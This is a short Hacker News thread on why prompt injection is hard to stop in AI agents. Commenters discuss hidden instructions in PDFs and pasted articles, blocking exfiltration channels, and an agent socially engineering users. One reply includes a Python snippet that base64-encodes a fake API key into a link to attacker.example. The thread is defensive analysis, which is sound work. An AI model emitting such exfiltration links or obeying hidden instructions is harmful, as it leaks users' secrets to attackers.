▲ | simonw 7 hours ago
The "exposure to untrusted data" one is the hardest to cut off, because you never know if a user might be tricked into uploading a PDF with hidden instructions, or copying and pasting in some long article that has instructions they didn't notice (or that used unicode tricks to hide themselves). The easiest leg to cut off is the exfiltration vectors. That's the solution most products take - make sure there's no tool for making arbitrary HTTP requests to other domains, and that the chat interface can't render an image that points to an external domain. If you let your agent send, receive and search email you're doomed. I think that's why there are very few products on the market that do that, despite the enormous demand for AI email assistants. | |||||||||||||||||
▲ | patapong 6 hours ago | parent | next [-]
I think stopping exfiltration will turn out to be hard as well, since the LLM can social engineer the user into helping it exfiltrate the data. For example, an LLM could say "Go to this link to learn more about your problem" and point them to a URL with encoded data, set up malicious scripts in e.g. deploy hooks, or just output HTML that sends requests when opened.
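To make the "URL with encoded data" trick concrete, here's a minimal sketch (the attacker domain and the secret are invented) of the kind of link an injected prompt can get the model to emit:

```python
import base64

# Data the injected instructions told the model to collect.
stolen = "api_key=sk-live-123..."

# Encode it into a harmless-looking "learn more" URL.
payload = base64.urlsafe_b64encode(stolen.encode()).decode()
link = f"https://attacker.example/help?ref={payload}"

print(f"For more details on fixing this, see {link}")
# One click (or a chat client that auto-unfurls links) and the data
# lands in the attacker's server logs.
```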
▲ | datadrivenangel 7 hours ago | parent | prev [-]
So the easiest solution is full human in the loop & approval for every external action... Agents are doomed :)